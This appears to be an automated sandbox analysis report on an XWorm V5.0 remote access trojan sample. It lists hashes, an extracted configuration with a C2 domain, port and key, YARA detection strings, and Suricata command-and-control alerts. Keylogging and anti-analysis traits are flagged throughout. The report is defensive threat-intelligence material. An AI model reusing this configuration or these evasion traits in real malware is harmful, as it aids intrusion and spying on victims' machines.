Create Interactive Tour

Windows Analysis Report
1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe

Overview

General Information

Sample name:1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
Analysis ID:1652322
MD5:919d580a19380debbf5159ec58c35562
SHA1:6ec5d5f491148e4891666dedbce2f7f5976e59d6
SHA256:877cbf41e73553688fed3a860de3bdaf5697a591ae9525469b00242137eaaa15
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cleanup
{
  "C2 url": [
    "jeggawire.ddns.net"
  ],
  "Port": 1111,
  "Aes key": "<123456789>",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe",
  "Version": "XWorm V5.0"
}
SourceRuleDescriptionAuthorStrings
1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeJoeSecurity_XWormYara detected XWormJoe Security
    1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x6377:$str01: $VB$Local_Port
    • 0x6368:$str02: $VB$Local_Host
    • 0x6662:$str03: get_Jpeg
    • 0x6027:$str04: get_ServicePack
    • 0x70ea:$str05: Select * from AntivirusProduct
    • 0x72e8:$str06: PCRestart
    • 0x72fc:$str07: shutdown.exe /f /r /t 0
    • 0x73ae:$str08: StopReport
    • 0x7384:$str09: StopDDos
    • 0x747a:$str10: sendPlugin
    • 0x7618:$str12: -ExecutionPolicy Bypass -File "
    • 0x7741:$str13: Content-length: 5235
    1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x79ae:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7a4b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7b60:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x765c:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x77ae:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x784b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7960:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x745c:$cnc4: POST / HTTP/1.1
      00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Process Memory Space: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe PID: 6920JoeSecurity_XWormYara detected XWormJoe Security
          SourceRuleDescriptionAuthorStrings
          0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x6377:$str01: $VB$Local_Port
            • 0x6368:$str02: $VB$Local_Host
            • 0x6662:$str03: get_Jpeg
            • 0x6027:$str04: get_ServicePack
            • 0x70ea:$str05: Select * from AntivirusProduct
            • 0x72e8:$str06: PCRestart
            • 0x72fc:$str07: shutdown.exe /f /r /t 0
            • 0x73ae:$str08: StopReport
            • 0x7384:$str09: StopDDos
            • 0x747a:$str10: sendPlugin
            • 0x7618:$str12: -ExecutionPolicy Bypass -File "
            • 0x7741:$str13: Content-length: 5235
            0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x79ae:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7a4b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x7b60:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x765c:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-30T21:28:30.618078+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:28:37.026992+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:28:50.076928+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:28:57.616715+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:03.141015+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:16.201894+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:25.297158+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:27.616448+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:30.973164+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:31.199153+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:41.667276+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:44.238782+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:46.559500+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:46.791098+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:50.584427+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:52.485613+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:52.716309+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:56.172156+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:02.900388+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:03.446405+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:07.468590+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:14.659168+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:15.717930+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:19.097059+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:19.336909+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:23.220897+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:27.607442+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:28.024230+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:29.747415+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:39.983246+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:42.541377+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:42.772653+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:45.185681+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:45.672018+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:49.039359+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:50.222627+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:50.449491+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:53.515036+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:54.642100+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:55.975443+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:56.202106+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:56.661536+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:57.481385+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:57.713540+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:59.642080+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:01.764395+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:01.994939+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:12.294902+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:12.914985+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:13.543507+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:22.333521+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:22.563340+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:26.705027+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:27.613966+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:38.775615+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:42.651107+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:44.847444+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:47.839116+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:48.077092+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:48.304570+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:50.543294+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:52.612713+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:53.127478+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:54.308826+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:54.532671+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:57.611278+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:59.705194+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:32:05.022729+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:32:05.249310+020028528701Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-30T21:28:37.037271+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:28:50.079672+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:03.143741+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:16.206043+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:25.305031+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:31.199420+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:31.426712+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:41.671826+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:44.240550+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:46.791192+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:47.083092+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:50.586100+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:52.716415+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:52.993486+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:56.179138+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:56.641580+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:29:57.915595+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:03.446534+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:03.668617+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:07.471577+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:14.661452+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:15.720319+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:19.337148+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:19.559107+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:23.222640+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:27.947299+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:29.749554+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:39.986702+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:42.775637+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:43.058511+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:45.187364+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:45.674464+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:49.045533+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:50.449918+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:50.679773+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:53.517397+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:54.643756+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:56.202178+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:56.941051+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:57.483321+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:30:59.643915+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:01.995006+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:02.396424+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:12.418241+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:12.919282+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:13.545173+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:13.920319+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:22.563528+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:22.794099+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:26.708183+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:38.779465+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:42.712842+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:44.848978+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:48.304666+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:48.537951+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:50.547459+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:52.620940+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:53.133513+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:54.761513+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:31:59.708964+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:32:05.782262+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:32:19.664125+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:32:19.947511+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            2025-03-30T21:32:20.313328+020028529231Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-30T21:28:30.618078+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:28:57.616715+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:29:27.616448+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:27.607442+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:30:57.713540+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:27.613966+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            2025-03-30T21:31:57.611278+020028528741Malware Command and Control Activity Detected176.65.134.561111192.168.2.849682TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-30T21:30:02.673286+020028531931Malware Command and Control Activity Detected192.168.2.849682176.65.134.561111TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeAvira: detected
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeMalware Configuration Extractor: Xworm {"C2 url": ["jeggawire.ddns.net"], "Port": 1111, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.0"}
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeVirustotal: Detection: 75%Perma Link
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeReversingLabs: Detection: 86%
            Source: Submited SampleNeural Call Log Analysis: 95.7%
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeString decryptor: jeggawire.ddns.net
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeString decryptor: 1111
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeString decryptor: <123456789>
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeString decryptor: <Xwormmm>
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeString decryptor: XWorm V5.0
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeString decryptor: USB.exe
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.65.134.56:1111 -> 192.168.2.8:49682
            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 176.65.134.56:1111 -> 192.168.2.8:49682
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49682 -> 176.65.134.56:1111
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49682 -> 176.65.134.56:1111
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49682 -> 176.65.134.56:1111
            Source: Malware configuration extractorURLs: jeggawire.ddns.net
            Source: unknownDNS query: name: jeggawire.ddns.net
            Source: global trafficTCP traffic: 192.168.2.8:49682 -> 176.65.134.56:1111
            Source: Joe Sandbox ViewASN Name: DIOGELO-ASGB DIOGELO-ASGB
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: jeggawire.ddns.net
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000002.3288796136.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, XLogger.cs.Net Code: KeyboardLayout

            System Summary

            barindex
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.0.1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe.5d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.840308538.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeCode function: 0_2_00007FF9368668760_2_00007FF936866876
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeCode function: 0_2_00007FF9368676220_2_00007FF936867622
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeCode function: 0_2_00007FF936862A280_2_00007FF936862A28
            Source: C:\Users\user\Desktop\1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeCode function: 0_2_00007FF93686B0540_2_00007FF93686B054
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe, 00000000.00000000.840323147.00000000005DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejegganewfile.exe4 vs 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeBinary or memory string: OriginalFilenamejegganewfile.exe4 vs 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exe
            Source: 1743362826ccceca1466d46143044cb8d624b4839206fb65ac2eea5a81b59a8e2977ae7bc5620.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
